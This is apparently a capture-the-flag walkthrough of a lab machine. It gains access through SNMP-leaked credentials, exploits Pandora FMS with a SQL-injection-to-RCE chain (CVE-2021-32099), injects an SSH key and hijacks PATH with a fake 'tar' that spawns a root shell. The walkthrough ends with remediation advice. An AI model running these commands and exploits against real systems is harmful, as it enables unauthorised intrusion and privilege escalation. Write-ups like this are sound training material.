Enumeration

Nmap Scan

Initial reconnaissance revealed the following services:

nmap -sC -sV -p- 10.10.11.136

Key findings:

  • Port 22: SSH (OpenSSH 8.9p1)
  • Port 80: HTTP (Apache 2.4.52)
  • Port 161: SNMP (UDP)

Web Enumeration

The main website at port 80 appeared to be a basic company page. Technology profiling suggested WordPress, but further investigation proved otherwise.

Crawling & Fuzzing

Attempted various enumeration techniques:

  • Directory fuzzing with ffuf
  • Vhost enumeration
  • Content crawling with ReconSpider

All paths led nowhere, suggesting the need to pivot to other services.

SNMP Enumeration - UDP/161

SNMP (Simple Network Management Protocol) can reveal valuable information if misconfigured with default community strings.

Testing default community string “public”:

snmpwalk -v2c -c public 10.10.11.136

Credentials discovered:

daniel:HotelBabylon23

Initial Access

SSH Authentication

ssh [email protected]

Successfully authenticated using the SNMP-discovered credentials!

Post-Compromise Enumeration

# Check current user
id

# Enumerate users with shells
cat /etc/passwd | grep -v nologin

# Find SUID binaries
find / -perm -4000 2>/dev/null

Key finding: /usr/bin/pandora_backup - SUID binary (not yet executable by daniel)

Internal Web Server Discovery

Checking Apache configuration:

ls -la /etc/apache2/sites-enabled/
cat /etc/apache2/sites-enabled/pandora.conf

Discovery: Internal Pandora FMS instance running on localhost!

<VirtualHost localhost:80>
    ServerAdmin [email protected]
    DocumentRoot /var/www/pandora
    ...
</VirtualHost>

Port Forwarding

Accessing the internal web server via SSH local port forwarding:

ssh -L 8081:127.0.0.1:80 [email protected]

Now accessible at http://localhost:8081 on the attack box!

Exploitation - Pandora FMS

Version Identification

Pandora FMS v7.0NG.742 - vulnerable version discovered!

CVE Research

Found unauthenticated SQL injection leading to RCE:

  • SQL injection in chart_generator.php via session_id parameter
  • Chained with authenticated RCE vulnerability

Exploit Execution

# Download exploit
wget https://github.com/[exploit-repo]/pandora-sqli-rce.py

# Execute against internal instance
python3 pandora-sqli-rce.py -t http://localhost:8081

Result: Command execution as user matt!

whoami
# matt

cat /home/matt/user.txt
# [user flag]

Lateral Movement - Daniel ? Matt

To get a stable shell, we need SSH access as matt.

SSH Key Injection

# Create .ssh directory
mkdir /home/matt/.ssh

# Generate SSH key pair on attacker machine
ssh-keygen -f matt_key

# URL-encode the public key (for GET request)
# Use CyberChef or similar tool

# Inject public key via RCE
echo "ssh-rsa AAAA..." > /home/matt/.ssh/authorized_keys

SSH Access

ssh -i matt_key [email protected]

Stable shell as matt achieved! ?

Privilege Escalation

SUID Binary Analysis

Remember /usr/bin/pandora_backup? Now we can execute it!

ls -la /usr/bin/pandora_backup
# -rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup

Static Analysis

Transfer binary to local machine for analysis:

# On target
base64 /usr/bin/pandora_backup

# On attacker machine
echo '[base64_output]' | base64 -d > pandora_backup

# Analyze with strings
strings pandora_backup

Vulnerability discovered: PATH injection!

The binary calls tar without absolute path:

tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora

Exploitation

Create Malicious tar Binary

cd /home/matt
cat > tar << 'EOF'
#!/bin/bash
/bin/bash -p
EOF

chmod +x tar

Modify PATH

export PATH=/home/matt:$PATH

Execute Vulnerable Binary

/usr/bin/pandora_backup

ROOT SHELL OBTAINED! ??

whoami
# root

cat /root/root.txt
# [root flag]

Key Takeaways

Vulnerabilities Exploited

  1. SNMP Misconfiguration - Default community string exposed credentials
  2. Outdated Pandora FMS - SQL injection + RCE chain (CVE-2021-32099)
  3. PATH Injection - SUID binary calling external programs without absolute paths

Remediation

  • Change default SNMP community strings to complex values
  • Keep software updated (especially web applications)
  • Use absolute paths in SUID binaries
  • Apply principle of least privilege
  • Disable unnecessary services (SNMP if not needed)

Techniques Used

  • SNMP enumeration (snmpwalk)
  • SSH local port forwarding
  • SQL injection ? RCE chaining
  • SUID exploitation via PATH injection
  • Binary static analysis (strings)

Tools Used

  • nmap
  • snmpwalk
  • ffuf
  • ssh
  • strings
  • base64